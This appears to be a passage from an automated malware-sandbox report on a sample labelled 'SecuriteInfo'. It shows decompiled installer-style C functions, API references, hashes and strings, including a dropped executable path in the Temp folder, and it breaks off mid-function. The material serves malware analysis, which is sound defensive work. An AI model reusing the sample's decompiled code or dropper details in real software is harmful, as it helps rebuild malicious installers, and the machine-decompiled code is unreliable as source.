0x00405846
0x00405849
0x0040584c
0x0040584d
0x0040584e
0x00405867
0x0040586a
0x00405874
0x00405883
0x0040588b
0x00405893
0x00405898
0x0040589b
0x004058a7
0x004058b0
0x004058b9
0x004058db
0x004058e1
0x004058f2
0x004058f7
0x00405905
0x00405913
0x00405913
0x00405918
0x00405926
0x00405926
0x0040592b
0x0040592e
0x00405933
0x0040593f
0x00405948
0x00405955
0x00405964
0x00405957
0x0040595c
0x0040595c
0x00405970
0x00405970
0x00405984
0x0040598d
0x00405996
0x004059a6
0x004059b2
0x004059b2
0x00000000

APIs

GetDlgItem.USER32 ref: 0040586D
GetDlgItem.USER32 ref: 0040587C
GetClientRect.USER32 ref: 004058B9
GetSystemMetrics.USER32 ref: 004058C0
SendMessageW.USER32(?,00001061,00000000,?), ref: 004058E1
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058F2
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405905
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405913
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405926
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405948
ShowWindow.USER32(?,00000008), ref: 0040595C
GetDlgItem.USER32 ref: 0040597D
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040598D
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A6
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059B2
GetDlgItem.USER32 ref: 0040588B

Part of subcall function 004045FF: SendMessageW.USER32(00000028,?,00000001,0040442A), ref: 0040460D

GetDlgItem.USER32 ref: 004059CF
CreateThread.KERNEL32 ref: 004059DD
CloseHandle.KERNEL32(00000000), ref: 004059E4
ShowWindow.USER32(00000000), ref: 00405A08
ShowWindow.USER32(?,00000008), ref: 00405A0D
ShowWindow.USER32(00000008), ref: 00405A57
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A8B
CreatePopupMenu.USER32 ref: 00405A9C
AppendMenuW.USER32 ref: 00405AB0
GetWindowRect.USER32 ref: 00405AD0
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE9
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B21
OpenClipboard.USER32(00000000), ref: 00405B31
EmptyClipboard.USER32 ref: 00405B37
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B43
GlobalLock.KERNEL32 ref: 00405B4D
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B61
GlobalUnlock.KERNEL32(00000000), ref: 00405B81
SetClipboardData.USER32 ref: 00405B8C
CloseClipboard.USER32 ref: 00405B92

Strings

{, xrefs: 00405A75

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: a77729b42b97d1460badf31275b058d201800e7c8612f90bf0790785bfc588e5
Instruction ID: f3bb878df23a29f955279a02cf148875578f9ab87112c8cbe183df0a3e5e7c84
Opcode Fuzzy Hash: a77729b42b97d1460badf31275b058d201800e7c8612f90bf0790785bfc588e5
Instruction Fuzzy Hash: 7DB16BB1900608FFDF119F64DD89AAE7B79FB45354F00802AFA41BA1A0CB785E51DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00404ABB Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404ABB(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x7a0f60;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x7a9000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CB2(0x3fb, _t146);
					E004068F5(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405CB2(0x3fb, _t146);
							if(E00406045(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040666E(0x79ff58, _t146);
							_t87 = E00406A3B(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040666E(0x79ff58, _t146);
								_t89 = E00405FE8(0x79ff58);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x79ff58,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x79ff58) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x79ff58,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405F89(0x79ff58);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x79ff58) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404F58(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x7a7a7c + 0x10)) != _t158) {
									E00404F40(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x79ff48);
									} else {
										E00404E77(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x7a8b44 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004045EC(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x7a1f78 == _t158) {
									E00404A14();
								}
								 *0x7a1f78 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x7a1f88;
							_v60 = E00404E11;
							_v56 = _t146;
							_v68 = E004066AB(_t146, 0x7a1f88, _t167, 0x7a0760, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405F3D(_t146);
								_t125 =  *((intOrPtr*)( *0x7a8ab0 + 0x11c));
								if( *((intOrPtr*)( *0x7a8ab0 + 0x11c)) != 0 && _t146 == L"C:\\Users\\jones\\AppData\\Local\\Temp") {
									E004066AB(_t146, 0x7a1f88, _t167, 0, _t125);
									if(lstrcmpiW(0x7a6a40, 0x7a1f88) != 0) {
										lstrcatW(_t146, 0x7a6a40);
									}
								}
								 *0x7a1f78 =  *0x7a1f78 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405FB4(_t146) != 0 && E00405FE8(_t146) == 0) {
						E00405F3D(_t146);
					}
					 *0x7a7a78 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004045CA(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004045CA(_t167);
					E004045FF(_t166);
					_t138 = E00406A3B(8);
					if(_t138 == 0) {
						L53:
						return E00404631(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

0x00404abb
0x00404ac1
0x00404ac7
0x00404ad4
0x00404ae2
0x00404ae5
0x00404aed
0x00404af3
0x00404af3
0x00404aff
0x00404b02
0x00404b70
0x00404b77
0x00404c4e
0x00404c55
0x00404c64
0x00404c64
0x00404c68
0x00404c72
0x00404c7f
0x00404c81
0x00404c81
0x00404c8f
0x00404c96
0x00404c9d
0x00404ca0
0x00404cdc
0x00404cde
0x00404ce4
0x00404ce9
0x00404ced
0x00404cef
0x00404cef
0x00404d0b
0x00000000
0x00404d0d
0x00404d10
0x00404d1e
0x00404d24
0x00404d25
0x00404d28
0x00404d2b
0x00000000
0x00404d2b
0x00404ca2
0x00404ca4
0x00404ca8
0x00000000
0x00000000
0x00000000
0x00000000
0x00404caa
0x00404caa
0x00404cb7
0x00404cbc
0x00000000
0x00000000
0x00404cc0
0x00404cc2
0x00404cc2
0x00404ccb
0x00404ccd
0x00404cd2
0x00404cd5
0x00404cda
0x00000000
0x00000000
0x00000000
0x00000000
0x00404cda
0x00404d37
0x00404d41
0x00404d44
0x00404d47
0x00404d4e
0x00404d4e
0x00404d50
0x00404d50
0x00404d55
0x00404d57
0x00404d5f
0x00404d66
0x00404d68
0x00404d73
0x00404d73
0x00404d68
0x00404d83
0x00404d8d
0x00404d95
0x00404db0
0x00404d97
0x00404da0
0x00404da0
0x00404d95
0x00404db5
0x00404dba
0x00404dbf
0x00404dc8
0x00404dc8
0x00404dd1
0x00404dd3
0x00404dd3
0x00404ddf
0x00404de7
0x00404df1
0x00404df1
0x00404df6
0x00000000
0x00404df6
0x00404ca0
0x00404c57
0x00404c5e
0x00000000
0x00000000
0x00000000
0x00404c5e
0x00404b7d
0x00404b86
0x00404ba0
0x00404ba5
0x00404baf
0x00404bb6
0x00404bc2
0x00404bc5
0x00404bc8
0x00404bcf
0x00404bd7
0x00404bda
0x00404bde
0x00404be5
0x00404bed
0x00404c47
0x00404bef
0x00404bf0
0x00404bf7
0x00404c01
0x00404c09
0x00404c16
0x00404c2a
0x00404c2e
0x00404c2e
0x00404c2a
0x00404c33
0x00404c40
0x00404c40
0x00404bed
0x00000000
0x00404ba5
0x00404b93
0x00000000
0x00000000
0x00404b99
0x00000000
0x00404b04
0x00404b11
0x00404b1a
0x00404b27
0x00404b27
0x00404b2e
0x00404b34
0x00404b3d
0x00404b40
0x00404b43
0x00404b4b
0x00404b4e
0x00404b51
0x00404b57
0x00404b5e
0x00404b65
0x00404dfc
0x00404e0e
0x00404b6b
0x00404b6e
0x00000000
0x00404b6e
0x00404b65

APIs

GetDlgItem.USER32 ref: 00404B0A
SetWindowTextW.USER32(00000000,?), ref: 00404B34
SHBrowseForFolderW.SHELL32(?), ref: 00404BE5
CoTaskMemFree.OLE32(00000000), ref: 00404BF0
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,007A1F88,00000000,?,?), ref: 00404C22
lstrcatW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl), ref: 00404C2E
SetDlgItemTextW.USER32 ref: 00404C40

Part of subcall function 00405CB2: GetDlgItemTextW.USER32(?,?,00000400,00404C77), ref: 00405CC5

Part of subcall function 004068F5: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406958
Part of subcall function 004068F5: CharNextW.USER32(?,?,?,00000000,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406967
Part of subcall function 004068F5: CharNextW.USER32(?,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040696C
Part of subcall function 004068F5: CharPrevW.USER32(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040697F

GetDiskFreeSpaceW.KERNEL32(0079FF58,?,?,0000040F,?,0079FF58,0079FF58,?,00000001,0079FF58,?,?,000003FB,?), ref: 00404D03
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D1E

Part of subcall function 00404E77: lstrlenW.KERNEL32(007A1F88,007A1F88,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F18
Part of subcall function 00404E77: wsprintfW.USER32 ref: 00404F21
Part of subcall function 00404E77: SetDlgItemTextW.USER32 ref: 00404F34

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00404C0B
A, xrefs: 00404BDE
C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl, xrefs: 00404C1C, 00404C21, 00404C2C

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl
API String ID: 2624150263-3781889236
Opcode ID: 1c3e24ea3c91ff4ce813832bee9d1a6c89b271b1ee61e594e0d9cbeb6062d674
Instruction ID: 4ef08ca0e285fb36132dd1072a135484aded6f5102cec428142970bb06395e88
Opcode Fuzzy Hash: 1c3e24ea3c91ff4ce813832bee9d1a6c89b271b1ee61e594e0d9cbeb6062d674
Instruction Fuzzy Hash: 77A182B1901209ABEB11AFA5CD45AEF77B9EF84314F11803BF601B62D1DB7C89418B69

Uniqueness

Uniqueness Score: -1.00%

Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004021AA() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405FB4( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\jones\\AppData\\Local\\Temp");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x004021b3
0x004021bd
0x004021c7
0x004021d1
0x004021dc
0x004021df
0x004021f9
0x004021fc
0x00402202
0x00402205
0x0040220f
0x00402213
0x00402213
0x00402218
0x00402229
0x00402231
0x004022e8
0x004022e8
0x004022ef
0x00402237
0x00402237
0x00402246
0x0040224a
0x0040224d
0x00402253
0x00402261
0x00402264
0x00402266
0x00402271
0x00402271
0x00402276
0x00402278
0x0040227f
0x0040227f
0x00402282
0x0040228b
0x0040228e
0x00402294
0x00402296
0x004022a0
0x004022a0
0x004022a3
0x004022ac
0x004022af
0x004022b8
0x004022be
0x004022c0
0x004022ce
0x004022ce
0x004022d1
0x004022d7
0x004022d7
0x004022da
0x004022e0
0x004022e6
0x004022fb
0x00000000
0x00000000
0x00000000
0x004022e6
0x004022f1
0x00402c2d
0x00402c39

APIs

CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00402269

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 542301482-47812868
Opcode ID: 95206bf645e1c446277479694b40913283949515a1362953c4f2174f782b348b
Instruction ID: c9e7058f2ccac2017f9d88f2873359e197591af4de9cbf84fabb751e216ccc72
Opcode Fuzzy Hash: 95206bf645e1c446277479694b40913283949515a1362953c4f2174f782b348b
Instruction Fuzzy Hash: A1411571A00209EFCF40DFE4C989E9D7BB5BF49304B2045AAF505EB2D1DB799981CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065B5( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E0040666E();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x00402923
0x0040293e
0x00402949
0x0040294a
0x00402a94
0x00402925
0x00402928
0x0040292b
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A

Memory Dump Source

Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 886e1da82f87bd9a052d385c947725ec3f25a605ee36621127924a1c8a89904e
Instruction ID: 9ced82c77f1422a0303d0e50afa4302c42ae01a582b6fde34da312f05d76664a
Opcode Fuzzy Hash: 886e1da82f87bd9a052d385c947725ec3f25a605ee36621127924a1c8a89904e
Instruction Fuzzy Hash: 5CF05E71904104EAD701DBA4E949AAEB378EF15314F20457BE101F21D0EBB88E119B29

Uniqueness

Uniqueness Score: -1.00%

Function 00405037 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00405037(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x7a8ac8;
				_v28 =  *0x7a8ab0 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x7a8ab9 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
